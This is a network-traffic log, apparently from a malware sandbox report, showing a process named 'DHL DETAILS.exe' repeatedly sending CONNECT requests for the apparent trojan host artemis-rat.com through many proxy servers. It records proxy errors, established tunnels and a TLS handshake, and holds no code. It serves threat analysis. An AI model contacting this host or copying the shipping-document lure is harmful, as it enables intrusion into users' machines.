                                                                                    Mar 9, 2024 13:14:14.741342068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.057111979 CET495INHTTP/1.1 502 Proxy Error
                                                                                    Date: Sat, 09 Mar 2024 12:13:24 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 348
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 44 4e 53 20 6c 6f 6f 6b 75 70 20 66 61 69 6c 75 72 65 20 66 6f 72 3a 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: artemis-rat.com</strong></p></p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    611192.168.2.551936104.20.24.214806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.746300936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.900670052 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    612192.168.2.551871201.174.239.2841536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.749536991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    613192.168.2.55139834.49.208.221806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.790579081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    614192.168.2.551821174.77.111.19741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.790901899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    615192.168.2.55181772.195.34.5841456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.791414022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    616192.168.2.551893154.205.152.9690806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.807966948 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:17.017849922 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:18.115350962 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:19.393222094 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:21.984776020 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:27.104886055 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:37.345010996 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    617192.168.2.55171943.231.22.229806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.808384895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.225425959 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    618192.168.2.55183372.195.34.4141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.808636904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    619192.168.2.55183524.249.199.1241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.808681011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    620192.168.2.551756167.172.86.46104716352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.808990002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    621192.168.2.551840174.77.111.198495476352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.809065104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    622192.168.2.551753103.13.229.19331286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.810223103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.536209106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.724009991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036513090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    623192.168.2.55133741.65.236.5619816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.810458899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.825762987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.868627071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    624192.168.2.551887184.170.249.6541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.810600996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    625192.168.2.55174194.20.183.172806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.810610056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    626192.168.2.551946172.67.253.69806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.810725927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.965444088 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    627192.168.2.55188535.72.118.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.811724901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.077734947 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:15.111816883 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 95 c8 d6 a3 7c 2a 5d 57 16 be f1 d1 2b 0e ac 4c 6e 26 31 2a 80 ff 39 07 ac e3 36 01 e9 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR|*]W+Ln&1*96*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:15.378422976 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 26 96 ac 7c 70 1f 71 89 b7 4a f4 ff 5b e0 52 de 90 00 f1 37 ad 05 e1 36 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9&|pqJ[R76DOWNGRD0000*H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0*H0LU,m-YLa
                                                                                    Mar 9, 2024 13:14:15.381058931 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 c7 29 03 a6 b0 c1 95 f9 5a 06 cc 2e 51 1f 0b 4e 4f ce d1 c6 54 cf a7 7b 9f af e1 d9 7d 8c 3b 56 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 bf 5e 56 b8 ce 33 50 2b d0 74 01 0b 3a 1a b6 da 80 2b 5f 68 2b
                                                                                    Data Ascii: %! )Z.QNOT{};V(^V3P+t:+_h+JS3)
                                                                                    Mar 9, 2024 13:14:15.644895077 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 78 27 50 7f 38 a5 17 a4 9d 31 f6 5d c2 62 be 0e 83 2f f3 68 66 8e ba ed 38 c7 d2 fb a5 ad 52 5b de 6f 0e 48 40 e6 58 92
                                                                                    Data Ascii: (x'P81]b/hf8R[oH@X


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    628192.168.2.551828147.47.224.16810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.811726093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    629192.168.2.55181551.15.223.24163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.811738014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.473865032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.381050110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.102435112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.591310024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    630192.168.2.551733103.190.54.14180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.811877012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    631192.168.2.551772212.108.155.20590906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.811877966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    632192.168.2.551961159.65.77.16885856352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.816447020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    633192.168.2.551851211.222.252.18781936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.819433928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    634192.168.2.551392177.234.244.174322136352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.823786974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    635192.168.2.551864211.222.252.18781976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.824100018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    636192.168.2.551760115.96.208.12480806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.825980902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.231586933 CET72INHTTP/1.1 200 Connection Established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    637192.168.2.552006104.21.102.95806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.837526083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.991897106 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    638192.168.2.55194198.162.25.7316536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
